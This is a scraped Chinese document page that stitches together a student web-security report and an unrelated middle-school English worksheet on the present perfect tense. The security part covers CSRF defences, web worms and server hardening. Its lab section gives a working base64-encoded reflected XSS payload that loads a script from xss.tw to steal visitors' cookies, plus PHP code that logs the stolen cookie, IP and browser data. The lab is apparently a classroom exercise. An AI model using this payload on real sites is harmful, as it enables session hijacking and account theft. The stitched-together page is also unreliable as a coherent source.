,但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點(diǎn)內(nèi)的信任用戶,而CSRF則通過偽裝來自受信任用戶的請求來利用受信任的網(wǎng)站。與XSS攻擊相比,CSRF攻擊往往不大流行和難以防范,所以被認(rèn)為比XSS更具危險(xiǎn)性。即在某個(gè)惡意站點(diǎn)的頁面上,促使訪問者請求你的網(wǎng)站的某個(gè)URL,從而達(dá)到改變服務(wù)器端數(shù)據(jù)的目的。這一類攻擊依賴于你的網(wǎng)頁中的表單,脆弱的表單很容易受到攻擊。對于你網(wǎng)站中的訪問者而言,可能會(huì)受到以下攻擊:在你的網(wǎng)站之外記錄受攻擊者的日志(比如:Slashdot);修改受攻擊者在你的網(wǎng)站的設(shè)置(比如:Google);修改你的硬件防火墻;使用受攻擊者的登錄信息在你的網(wǎng)站中發(fā)表評論或留言;將資金轉(zhuǎn)移到另一個(gè)用戶帳號中。CSRF攻擊的典型是那些使用cookie記錄登錄信息的網(wǎng)站,但對于一些允許某個(gè)IP地址訪問的頁面(如內(nèi)部網(wǎng)),這一類攻擊也會(huì)奏效。CSRF攻擊通常會(huì)使用到JavaScript(但不僅限于JavaScript)實(shí)現(xiàn)跨站點(diǎn)自動(dòng)提交表單--表單數(shù)據(jù)可以隱藏,提交按鈕可以偽裝成鏈接或滾動(dòng)條。確定那些接受可改變服務(wù)器數(shù)據(jù)的CGI只接受POST參數(shù),不接受GET參數(shù),一些服務(wù)器端語言默認(rèn)同時(shí)接受兩種方式提交過來的參數(shù);確定表單提交處理的是你自己的表單,可以使用一個(gè)隱藏字段中存放MD5字符串,此字符串是將登錄cookie數(shù)據(jù)與服務(wù)器端存放的密鑰進(jìn)行MD5之后的結(jié)果,只有這個(gè)MD5字符串正確時(shí)才接受表單數(shù)據(jù);另外還可以增加一個(gè)更為嚴(yán)格的方法:在表單中增加一個(gè)時(shí)間戳的隱藏字段,并將其包含到hash字符串中,如果時(shí)間戳超過某個(gè)時(shí)間,則認(rèn)為表單已過期。當(dāng)表單過期時(shí),給出一個(gè)方法可以讓用戶重新提交表單,比如將用戶之前填寫的數(shù)據(jù)依舊放入表單中,但使用一個(gè)新的hash字符串。一個(gè)PHP的表單例子,表單代碼:<?php$key=y8s4Z7m2;//MD5加密密鑰$time=time();//當(dāng)前時(shí)間$hash=md5($time.$key);//hash字符串?<formmethod="post"action="comment.php"<pYourname:<inputtype="text"name="person_name"/</p<pComment:/<textareaname="comment"rows="10"cols="60"</textarea</p<inputtype="hidden"name="time"value="<?phpecho$time;?"/<inputtype="hidden"name="hash"value="<?phpecho$hash;?"/<p<inputtype="submit"name="comment"value="SubmitComment"/</p</form表單提交之后的comment.php后臺處理程序代碼:<?php$key=y8s4Z7m2;//密鑰,與上面的一致$expire=1800;//表單過期時(shí)間:半小時(shí)$my_hash=md5($_POST[time].$key);//正確的hash字符串if($my_hash!=$_POST[hash])//hash字符串不正確die(非法表單提交。);if(time()-$_POST[time]$expire){//表單已經(jīng)過期,生成新的時(shí)間戳和hash字符串,顯示表單讓用戶重新提交。(此處省略)//….}//表單驗(yàn)證通過,可以接受表單提交的數(shù)據(jù),并進(jìn)行其它操作。六、Web蠕蟲Web蠕蟲主要包括:XSS蠕蟲、CSRF蠕蟲、Clickjacking蠕蟲,這三類蠕蟲都與具體的漏洞風(fēng)險(xiǎn)有關(guān)系,從名字上很好分。還有第四類文本蠕蟲。蠕蟲性質(zhì):傳播性,病毒性為。什么是xss蠕蟲蠕蟲病毒,比如前幾年比較猖獗的熊貓燒香,還有最近Conficker蠕蟲。這些蠕蟲的特性都是具有自傳播,感染,變形等。最近流行的豬流感按照理論也算蠕蟲病毒。而近年來由于ajax流行,web2.0的一些特性,使得web蠕蟲流行。任何一個(gè)蠕蟲都不無原緣無故發(fā)作的,比如熊貓燒香是利用掛馬,遠(yuǎn)程掃描等方式感染的,而這歸根結(jié)底還是系統(tǒng)有漏洞。那么web蠕蟲的切入點(diǎn)就是web有漏洞了。從03年腳本入侵流行一來,sql注射就是最流行的入侵方式,但是由于現(xiàn)在人們的安全意識的提高,sql漏洞越來越少,xss的漏洞就開始凸顯出來,而xss可以使我們嵌入任意我們需要的代碼,比如盜個(gè)cookie等,當(dāng)別人訪問的時(shí)候會(huì)吧自己的發(fā)送到你指定的文件里去。一個(gè)xss蠕蟲都有什么基本功能之前在說熊貓燒香之類的蠕蟲病毒已經(jīng)說過了這個(gè)內(nèi)容,傳播感染和變形,而現(xiàn)在web蠕蟲先不用發(fā)展那么高級,而我們只需要寫出傳播和感染就行,至于變形,除非漏洞被過濾了我們還需要繞過那么就需要一定得變形,而這種變形一般不會(huì)影響我們寫的蠕蟲文件,會(huì)影響到調(diào)用蠕蟲文件的代碼。CSRF蠕蟲原理與XSS蠕蟲基本類似,只是這里用到的是CSRF,攻擊代碼存在于攻擊者的頁面中,目標(biāo)網(wǎng)站傳播的內(nèi)容都包含攻擊者頁面URL,這樣才能有貨目標(biāo)網(wǎng)站上的被攻擊者打開攻擊者頁面,然后出發(fā)CSRF,CSRF會(huì)據(jù)需跨域發(fā)布含攻擊者頁面URL的內(nèi)容進(jìn)行傳播。八、Web面臨的安全威脅來自網(wǎng)絡(luò)上的安全威脅與攻擊多種多樣,依照Web訪問的結(jié)構(gòu),可將其分類為對Web服務(wù)器的安全威脅、對Web客戶機(jī)的安全威脅和對通信信道的安全威脅三類。(一)對Web服務(wù)器的安全威脅對于Web服務(wù)器、服務(wù)器的操作系統(tǒng)、數(shù)據(jù)庫服務(wù)器都有可能存在漏洞,惡意用戶都有可能利用這些漏洞去獲得重要信息。Web服務(wù)器上的漏洞可以從以下幾方面考慮:1、在Web服務(wù)器上的機(jī)密文件或重要數(shù)據(jù),如存放用戶名、口令的文件放置在不安全區(qū)域,被入侵后很容易得到。2、在Web數(shù)據(jù)庫中,保存的有價(jià)值信息,如商業(yè)機(jī)密數(shù)據(jù)、用戶信息等,如果數(shù)據(jù)庫安全配置不當(dāng),很容易泄密。3、Web服務(wù)器本身存在一些漏洞,能被黑客利用侵入到系統(tǒng),破壞一些重要的數(shù)據(jù),甚至造成系統(tǒng)癱瘓。4、程序員的有意或無意在系統(tǒng)中遺漏Bugs給非法黑客創(chuàng)造條件。用CGI腳本編寫的程序中的自身漏洞。(二)對Web客戶機(jī)的安全威脅現(xiàn)在網(wǎng)頁中的活動(dòng)內(nèi)容已被廣泛應(yīng)用,活動(dòng)內(nèi)容的不安全性是造成客戶端的主要威脅。網(wǎng)頁的活動(dòng)內(nèi)容是指在靜態(tài)網(wǎng)頁中嵌入的對用戶透明的程序,它可以完成一些動(dòng)作,顯示動(dòng)態(tài)圖像、下載和播放音樂、視頻等。當(dāng)用戶使用瀏覽器查看帶有活動(dòng)內(nèi)容的網(wǎng)頁時(shí),這些應(yīng)用程序會(huì)自動(dòng)下載并在客戶機(jī)上運(yùn)行,如果這些程序被惡意使用,可以竊取、改變或刪除客戶機(jī)上的信息。主要用到JavaApplet和ActiveX技術(shù)。JavaApplet使用Java語言開發(fā),隨頁面下載,Java使用沙盒根據(jù)安全模式所定義的規(guī)則來限制JavaApplet的活動(dòng),它不會(huì)訪問系統(tǒng)中規(guī)定安全范圍之外的程序代碼。但事實(shí)上JavaApplet存在安全漏洞,可能被利用進(jìn)行破壞。ActiveX是微軟的一個(gè)控件技術(shù),它封裝由網(wǎng)頁設(shè)計(jì)者放在網(wǎng)頁中來執(zhí)行特定的任務(wù)的程序,可以由微軟支持的多種語言開發(fā)但只能運(yùn)行在Windows平臺。ActiveX在安全性上不如JavaApplet,一旦下載,能像其他程序一樣執(zhí)行,訪問包括操作系統(tǒng)代碼在內(nèi)的所有系統(tǒng)資源,這是非常危險(xiǎn)的。Cookie是Netscape公司開發(fā)的,用來改善HTTP的無狀態(tài)性。無狀態(tài)的表現(xiàn)使得制造像購物車這樣要在一定時(shí)間內(nèi)記住用戶動(dòng)作的東西很難。Cookie實(shí)際上是一段小消息,在瀏覽器第一次連接時(shí)由HTTP服務(wù)器送到瀏覽器端,以后瀏覽器每次連接都把這個(gè)Cookie的一個(gè)拷貝返回給Web服務(wù)器,服務(wù)器用這個(gè)Cookie來記憶用戶和維護(hù)一個(gè)跨多個(gè)頁面的過程影像。Cookie不能用來竊取關(guān)于用戶或用戶計(jì)算機(jī)系統(tǒng)的信息,它們只能在某種程度上存儲(chǔ)用戶的信息,如計(jì)算機(jī)名字、IP地址、瀏覽器名稱和訪問的網(wǎng)頁的URL等。所以,Cookie是相對安全的。(三)對通信信道的安全威脅Internet是連接Web客戶機(jī)和服務(wù)器通信的信道,是不安全的。像Sniffer這樣的嗅探程序,可對信道進(jìn)行偵聽,竊取機(jī)密信息,存在著對保密性的安全威脅。未經(jīng)授權(quán)的用戶可以改變信道中的信息流傳輸內(nèi)容,造成對信息完整性的安全威脅。此外,還有像利用拒絕服務(wù)攻擊,向網(wǎng)站服務(wù)器發(fā)送大量請求造成主機(jī)無法及時(shí)響應(yīng)而癱瘓,或者發(fā)送大量的IP數(shù)據(jù)包來阻塞通信信道,使網(wǎng)絡(luò)的速度便緩慢。九、Web的安全防護(hù)技術(shù)(一)Web客戶端的安全防護(hù)Web客戶端的防護(hù)措施,重點(diǎn)對Web程序組件的安全進(jìn)行防護(hù),嚴(yán)格限制從網(wǎng)絡(luò)上任意下載程序并在本地執(zhí)行。可以在瀏覽器進(jìn)行設(shè)置,如MicrosoftInternetExplorer的Internet選項(xiàng)的高級窗口中將Java相關(guān)選項(xiàng)關(guān)閉。在安全窗口中選擇自定義級別,將ActiveX組件的相關(guān)選項(xiàng)選為禁用。在隱私窗口中根據(jù)需要選擇Cookie的級別,也可以根據(jù)需要將c:\windows\cookie下的所有Cookie相關(guān)文件刪除。(二)通信信道的安全防護(hù)通信信道的防護(hù)措施,可在安全性要求較高的環(huán)境中,利用HTTPS協(xié)議替代HTTP協(xié)議。利用安全套接層協(xié)議SSL保證安全傳輸文件,SSL通過在客戶端瀏覽器軟件和Web服務(wù)器之間建立一條安全通信信道,實(shí)現(xiàn)信息在Internet中傳送的保密性和完整性。但SSL會(huì)造成Web服務(wù)器性能上的一些下降。(三)Web服務(wù)器端的安全防護(hù)限制在Web服務(wù)器中賬戶數(shù)量,對在Web服務(wù)器上建立的賬戶,在口令長度及定期更改方面作出要求,防止被盜用。Web服務(wù)器本身會(huì)存在一些安全上的漏洞,需要及時(shí)進(jìn)行版本升級更新。盡量使EMAIL、數(shù)據(jù)庫等服務(wù)器與Web服務(wù)器分開,去掉無關(guān)的網(wǎng)絡(luò)服務(wù)。在Web服務(wù)器上去掉一些不用的如SHELL之類的解釋器。定期查看服務(wù)器中的日志文件,分析一切可疑事件。設(shè)置好Web服務(wù)器上系統(tǒng)文件的權(quán)限和屬性。通過限制許可訪問用戶IP或DNS。從CGI編程角度考慮安全。采用編譯語言比解釋語言會(huì)更安全些,并且CGI程序應(yīng)放在獨(dú)立于HTML存放目錄之外的CGI-BIN下等措施。十、Web服務(wù)器安全防護(hù)策略的應(yīng)用這里以目前應(yīng)用較多的Windows2000平臺和IIS的Web服務(wù)器為例簡述Web服務(wù)器端安全防護(hù)的策略應(yīng)用(一)系統(tǒng)安裝的安全策略安裝Windows2000系統(tǒng)時(shí)不要安裝多余的服務(wù)和多余的協(xié)議,因?yàn)橛械姆?wù)存在有漏洞,多余的協(xié)議會(huì)占用資源。安裝Windows2000后一定要及時(shí)安裝補(bǔ)丁4程序(W2KSP4_CN.exe),立刻安裝防病毒軟件。(二)系統(tǒng)安全策略的配置通過“本地安全策略”限制匿名訪問本機(jī)用戶、限制遠(yuǎn)程用戶對光驅(qū)或軟驅(qū)的訪問等。通過“組策略”限制遠(yuǎn)程用戶對Netmeeting的桌面共享、限制用戶執(zhí)行Windows安裝任務(wù)等安全策略配置。(三)IIS安全策略的應(yīng)用在配置Internet信息服務(wù)(IIS)時(shí),不要使用默認(rèn)的Web站點(diǎn),刪除默認(rèn)的虛擬目錄映射;建立新站點(diǎn),并對主目錄權(quán)限進(jìn)行設(shè)置。一般情況下設(shè)置成站點(diǎn)管理員和Administrator兩個(gè)用戶可完全控制,其他用戶可以讀取文件。(四)審核日志策略的配置當(dāng)Windows2000出現(xiàn)問題的時(shí)候,通過對系統(tǒng)日志的分析,可以了解故障發(fā)生前系統(tǒng)的運(yùn)行情況,作為判斷故障原因的根據(jù)。一般情況下需要對常用的用戶登錄日志,HTTP和FTP日志進(jìn)行配置。1、設(shè)置登錄審核日志審核事件分為成功事件和失敗事件。成功事件表示一個(gè)用戶成功地獲得了訪問某種資源的權(quán)限,而失敗事件則表明用戶的嘗試失敗。2、設(shè)置HTTP審核日志通過“Internet服務(wù)管理器”選擇Web站點(diǎn)的屬性,進(jìn)行設(shè)置日志的屬性,可根據(jù)需要修改日志的存放位置。3、設(shè)置FTP審核日志設(shè)置方法同HTTP的設(shè)置基本一樣。選擇FTP站點(diǎn),對其日志屬性進(jìn)行設(shè)置,然后修改日志的存放位置。(五)網(wǎng)頁發(fā)布和下載的安全策略因?yàn)閃eb服務(wù)器上的網(wǎng)頁,需要頻繁進(jìn)行修改。因此,要制定完善的維護(hù)策略,才能保證Web服務(wù)器的安全。有些管理員為方便起見,采用共享目錄的方法進(jìn)行網(wǎng)頁的下載和發(fā)布,但共享目錄方法很不安全。因此,在Web服務(wù)器上要取消所有的共享目錄。網(wǎng)頁的更新采用FTP方法進(jìn)行,選擇對該FTP站點(diǎn)的訪問權(quán)限有“讀取、寫入”權(quán)限。對FTP站點(diǎn)屬性的“目錄安全性”在“拒絕訪問”對話框中輸入管理維護(hù)工作站的IP地址,限定只有指定的計(jì)算機(jī)可以訪問該FTP站點(diǎn),并只能對站點(diǎn)目錄進(jìn)行讀寫操作。實(shí)驗(yàn):網(wǎng)頁首頁,正常顯示發(fā)現(xiàn)可疑漏洞,地址欄出現(xiàn)編碼后的信息。這是一段明顯的Base64加密,對其進(jìn)行解碼
解密為:
title=%B5%C7%C2%BD%CA%A7%B0%DC%A3%AC%C3%DC%C2%EB%B2%BB%D5%FD%C8%B7%A1%A3&link=&url=
采用了雙重解碼機(jī)制,這是一段URL編碼,我們再次解碼得到:title=登陸失敗,密碼不正確。&link=&url=
這是一個(gè)可跨站點(diǎn),我們構(gòu)造代碼進(jìn)行測試。代碼構(gòu)造如下:title=%B5%C7%C2%BD%CA%A7%B0%DC%A3%AC%C3%DC%C2%EB%B2%BB%D5%FD%C8%B7%A1%A3</html><script>alert(“xss測試學(xué)號2011211975”)</script>&link=&url=進(jìn)行反向編碼dGl0bGU9JUI1JUM3JUMyJUJEJUNBJUE3JUIwJURDJUEzJUFDJUMzJURDJUMyJUVCJUIyJUJCJUQ1JUZEJUM4JUI3JUExJUEzPC9odG1sPjxzY3JpcHQ+YWxlcnQoHHhzc0vVIGb3MjAxMTIxMTk3NR0pPC9zY3JpcHQ+JiBsaW5rPSZ1cmw9帶入地址欄運(yùn)行,得到測試成功,構(gòu)造代碼竊取cookie.title=%B5%C7%C2%BD%CA%A7%B0%DC%A3%AC%C3%DC%C2%EB%B2%BB%D5%FD%C8%B7%A1%A3</html><scriptsrc=http://xss.tw/3841></script>&link=&url=編碼后得到:dGl0bGU9JUI1JUM3JUMyJUJEJUNBJUE3JUIwJURDJUEzJUFDJUMzJURDJUMyJUVCJUIyJUJCJUQ1JUZEJUM4JUI3JUExJUEzPC9odG1sPjxzY3JpcHQgc3JjPWh0dHA6Ly94c3MudHcvMzg0MT48L3NjcmlwdD4mbGluaz0mdXJsPQ==其中xss.tw是網(wǎng)絡(luò)上所架構(gòu)的一個(gè)xss測試平臺,可以作為一個(gè)中轉(zhuǎn)站記錄點(diǎn)擊者cookie.這類滲透的平臺的原理都是基于PHP等語言的cookie調(diào)用獲取,核心功能代碼如下:<?php$cookie=$_GET['cookie'];//以GET方式獲取cookie變量值$ip=$_SERVER['REMOTE_ADDR'];//遠(yuǎn)程主機(jī)IP地址$time=date('Y-m-dg:i:s');//以“年-月-日時(shí):分:秒”的格式顯示時(shí)間$referer=$_SERVER['HTTP_REFERER'];//鏈接來源$agent=$_SERVER['HTTP_USER_AGENT'];//用戶瀏覽器類型?>可見前端的漏洞是無處不在的,我們還應(yīng)該更多地了解好這些安全的機(jī)理才能在以后無論是編寫網(wǎng)站、軟件或者從事相關(guān)工作時(shí)有更好的安全意識和防范措施。
初中英語語法現(xiàn)在完成時(shí)練習(xí)題及答案[1]初中英語語法現(xiàn)在完成時(shí)練習(xí)題及答案[1]
/初中英語語法現(xiàn)在完成時(shí)練習(xí)題及答案[1]一、時(shí)態(tài)講解:現(xiàn)在完成時(shí)(1)構(gòu)成:現(xiàn)在完成時(shí)由助動(dòng)詞have+過去分詞構(gòu)成,助動(dòng)詞have有人稱和數(shù)的變化。第三人稱單數(shù)用has,其余用have.現(xiàn)在完成時(shí)的否定式直接在助動(dòng)詞后面加上not、疑問式是把助動(dòng)詞提到主語之前。以study為例,其否定式、疑問式和簡單回答形式如下:否定式
疑問式
Ihavenot(haven’t)studied….
HaveIstudied…?
Youhavenot(haven’t)studied….
Haveyoustudied…?
Hehasnot(hasn’t)studied….
Hashestudied…?
否定疑問式
簡單回答(肯定/否定)
HaveInot(Haven’tI)studied…?
Yes,youhave.No,youhaven’t.
Haveyounot(Haven’tyou)studied…?
Yes,Ihave.No,Ihaven’t.
Hashenot(Hasn’the)studied…?
Yes,hehas.No,hehasn’t.
(2)用法:1)現(xiàn)在完成時(shí)通常表示在說話之前已經(jīng)完成的動(dòng)作或存在的狀態(tài)。說話人強(qiáng)調(diào)的是該動(dòng)作或狀態(tài)對現(xiàn)在的結(jié)果或影響。Mydaughterhasjustgoneout.我女兒剛出去。I’msurewe’vemetbefore.我肯定我們以前見過面。Shehasarrived.她到了。2)表示持續(xù)到現(xiàn)在的動(dòng)作或狀態(tài),往往和包括現(xiàn)在在內(nèi)的表示一段時(shí)間的狀語連用,如recently,already,just,lately,for…,since…,yet等。如:Ihaven’theardfromherthesedays.這些日子我沒有收到她的信。Wehaven’tseenyourecently.最近我們沒有見到你。Theyhavebeenawayfortwoyears.他們離開已經(jīng)兩年了。ShehasbeenwithussinceMonday.★注意:since和for的區(qū)別since后接時(shí)間點(diǎn),如1993,lastterm,yesterday,thetimeIgottherefor后接一段時(shí)間,表示“長達(dá)多久”,如tenyears,awhile,twodays等。Exercise:用since和for填空1.JimhasbeeninIreland______Monday.2.JillhasbeeninIreland______threedays.3.HisaunthaslivedinAustralia______15days.4.Maryisinheroffice.Shehasbeenthere______7o'clock.5.Indiahasbeenanindependentcountry______1974.6.Thebusislate.They'vebeenwaiting______20minutes.7.Nobodylivesinthosehouses.Theyhavebeenempty______manyyears.8.Mikehasbeenill______alongtime.Hehasbeeninhospital______October.2)表示短暫意義的動(dòng)詞如arrive,leave,borrow,buy,begin,start,die等,在完成時(shí)當(dāng)中不能和表示一段時(shí)間的狀語連用,因?yàn)樗鼈儽硎镜膭?dòng)作不可能持續(xù)。因此,不能說:Hehascomeherefor2weeks.×Theoldmanhasdiedfor4months.×Theyhaveleftonlyfor5minutes.×以上三句話可以改為:Hehasbeenherefor2weeks.Theoldmanhas_____________for4months.Theyhave__________onlyfor5minutes2)have(has)been和have(has)gone的區(qū)別:表示“曾到過某地”要用“have(has)been”;表示“已經(jīng)去某地”要用“have(has)gone”。試比較:Wherehashebeen?他剛才到哪里去了?(已經(jīng)回來了)Wherehashegone?他上哪兒去了?(人不在)TheyhavebeentoCanada.他們到過加拿大。(現(xiàn)在已經(jīng)不在加拿大)TheyhavegonetoCanada.他們到加拿大去了。(可能在路上和已經(jīng)到加拿大).3)現(xiàn)在完成時(shí)不能和表示過去的時(shí)間狀語連用,如yesterday,lastyear,in1976,twodaysago,justnow,whenIcamein,但可以和already,yet,sometimes,always,often,before,lately,recently,once,twice,ever,never等連用。例如:Shehasalreadycome.她已經(jīng)來了。Ihaven’treadityet.我還沒讀過這個(gè)。Ihavemethimbefore.我從前曾見過他。MaHonghasalwaysbeenagoodstudent.馬紅一直是個(gè)好學(xué)生。Ihaveoftenseenhiminthestreet.我經(jīng)常在街上看見他。TheyhaveneverbeentoYan’an.他們從未去過延安。Ihaven'tseenhimlately.我近來沒看到他。IrregularVerbs
BaseForm
PastForm
PastParticiple
bear
bore
born
beat
beat
beaten
become
became
become
blow
blew
blown
bring
brought
brought
build
built
built
buy
bought
bought
catch
caught
caught
choose
chose
chosen
come
came
come
do
did
done
drink
drank
drunk
drive
drove
driven
eat
ate
eaten
fall
fell
fallen
find
found
found
fly
flew
flown
get
got
got
give
gave
given
go
went
gone
grow
grew
grown
have
had
had
hear
heard
heard
keep
kept
kept
leave
left
left
lose
lost
lost
make
made
made
put
put
put
read
read
read
run
ran
run
say
said
said
see
saw
seen
sell
sold
sold
send
sent
sent
sing
sang
sung
sink
sank/sunk
sunk
take
took
taken
teach
taught
taught
write
wrote
wrote
am,is
was
been
are
were
been
Exercise:I.Fillintheblankswiththeproperform.1.I____already____(see)thefilm.I________(see)itlastweek.2._____he____(finish)hisworktoday?Notyet.3.Myfather____just____(come)backfromwork.Heistirednow.4.Where’sLiMing?He__________(go)totheteacher’soffice.5.I__________(work)heresinceI______(move)herein1999.6.SofarI_______________(make)quiteafewfriendshere.7.Howlong________theWangs______________(stay)here?Fortwoweeks.8.I________just___________(finish)myhomework.9.He________(go)toschoolonfooteveryday.10.____you______(find)yoursciencebookyet?11.Ifit____(be)finetomorrow,I'llgowithyou.12.Thestudents____________(read)Englishwhentheteachercamein.13.Look!Themonkey__________(climb)thetree.14.Mymother__________(come)toseemenextSunday.15.I'velostmypen._________you________(see)itanywhere?II.Choosethebestanswer.1.Howlonghaveyou_______here?A.come B.got C.arrived D.been2.Mygrandpadied_________.A.attheageofmy2 B.for2yearsC.whenIwas2. D.myagewas6.3.Janehas_____toBeiJing.Shewillcomebacktomorrow.A.been B.gone C.went D.neverbeen4.Itistenyears_____Ilastsawher.A.after B.sinceC.forD.that5.--WhowillgotothestationtomeetLorry?--Iwill.I_____herseveraltimes.A.met B.havemet C.hadmet D.willmeet6.--Whatanicedress!Howlong_____you_____it?--Just2weeks.A.will,buy B.did,buy C.are,having D.have,had7.--DoyouknowLydiaverywell?--Yes,SheandI_____friendssincewewereveryyoung.A.havemade B.havebecome C.havebeen D.haveturned8.TheSmiths_______inChinafor8years.A.haslived B.lived C.havebeen D.live9.--Hello,thisisMr.Greenspeaking.CanIspeaktoMr.Black?--Sorry.He______theBainiaoPark.A.hasbeento B.hasgoneto C.wentto D.willgoto10.--____youever____totheUS?--Yes,twice.A.Have,goneB.Have,been C,Do,go D.were,goingIII.Rewritethesentences.1.IhavebeentoMacaubefore.(改為否定句)?I__________________beentoMacaubefore.
2.Hehasn’tcometoschoolbecausehewasill.(就劃線部分提問)_____________hecometoschool?
3.Iboughanewbikejustnow.(用just改寫)??I____just____anewbike.
4.WebegantolearnEnglishthreeyearsago.(改為同義句)We________English____threeyears5.Hehasneversurfed,______________?(改成反意疑問句)6.Theyhavebeenheresince2000.(對劃線部分提問)______________havetheybeenhere?7.Theoldman_________lastyear.Hehas______________forayear.(die)(動(dòng)詞填空)8.MissGaoleftanhourago.(同義句轉(zhuǎn)換)MissGaohas_______________________anhourago.Askthequestions1)Ihavebeentherefortwodays._____________________________you____________________?2)Myfatherhaslivedheresince2000.____________________________yourfather___________________?3)Helefthereyesterday.4)Theyboughtabooktwohoursago._____________________they__________abook?Use“never,ever,already,just,yet,for,since”tofillintheblanks.1.Ihave_______seenhimbefore,soIhavenoideaabouthim.2.Jackhas_________finishedhishomework.3.Mr.Wanghastaughtinthisschool________tenyears.4.“Haveyou________seenthefilm?”“No,Ihave________seenit.”5.“Hasthebusleft_______?”“Yes,ithas_________left.”現(xiàn)在完成時(shí)練習(xí)題一、翻譯下列句子:你曾經(jīng)吃過魚和薯?xiàng)l嗎?2.我剛剛丟了我的化學(xué)書。3.我以前從來沒去過那個(gè)農(nóng)場。4.他已經(jīng)吃過午飯5.你已經(jīng)看過這部電影了嗎?6.我哥哥還沒回來。7.這本字典我已買了三年了。8.他離開中國三年了。9.我認(rèn)識他們五年了。10.他們已去了美國五年了。11.自從他搬到濟(jì)寧,他就住這兒了。12.我妹妹成為一個(gè)大學(xué)生已經(jīng)三年。13.自從1999年以來他們就認(rèn)識。14.我來到這個(gè)學(xué)校已3年多了。二、用since和for填空1.______twoyears2.____twoyearsago3.___lastmonth4.______19995._______yesterday6._______4o’clock74hours8._____anhourago9.___wewerechildren10._____lunchtime11.____shelefthere12.HehaslivedinNanjing___theyearb
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024-2025學(xué)年新教材高中歷史第三單元遼宋夏金多民族政權(quán)的并立與元朝的統(tǒng)一第12課遼宋夏金元的文化課時(shí)作業(yè)含解析新人教版必修中外歷史綱要上
- 2025運(yùn)動(dòng)會(huì)團(tuán)隊(duì)口號重視合同確保質(zhì)
- 2025年商洛大車貨運(yùn)資格證考試題
- 2025萬科電梯安裝合同
- 2025年鄭州a2貨運(yùn)從業(yè)資格證模擬考試題
- 上海外國語大學(xué)《地理科技論文寫作文》2023-2024學(xué)年第一學(xué)期期末試卷
- 上海體育大學(xué)《計(jì)算機(jī)組成原理課程設(shè)計(jì)》2023-2024學(xué)年第一學(xué)期期末試卷
- 2025藥品代理經(jīng)銷合同 標(biāo)準(zhǔn)版模板全
- 2025私人借貸合同范文
- 2025液晶電視安裝播放協(xié)議書,合同范本合同協(xié)議書范本
- 設(shè)計(jì)構(gòu)成與應(yīng)用 完整全套教學(xué)課件 第1-12章 平面構(gòu)成設(shè)計(jì)元素- 立體構(gòu)成在建筑設(shè)計(jì)中的應(yīng)用
- 2、廣東省高速公路發(fā)展股份有限公司 2019年度內(nèi)控缺陷整改臺賬
- 物業(yè)公司安全生產(chǎn)檢查表
- 室內(nèi)配套設(shè)備家具、家電及窗簾等項(xiàng)目供貨服務(wù)方案技術(shù)投標(biāo)方案
- 公司規(guī)章制度清單
- 《高效能人士的七個(gè)習(xí)慣》PPT演講模板
- 獨(dú)領(lǐng)風(fēng)騷的古代技術(shù)創(chuàng)造
- 實(shí)用俄語會(huì)話知到章節(jié)答案智慧樹2023年山東交通學(xué)院
- 廣西南寧市2022-2023學(xué)年四年級數(shù)學(xué)第一學(xué)期期末學(xué)業(yè)質(zhì)量監(jiān)測模擬試題含解析
- 管理英語4寫作
- 國家電網(wǎng)招聘(計(jì)算機(jī)類)專業(yè)知識筆試歷年考試真題匯總(附答案)
評論
0/150
提交評論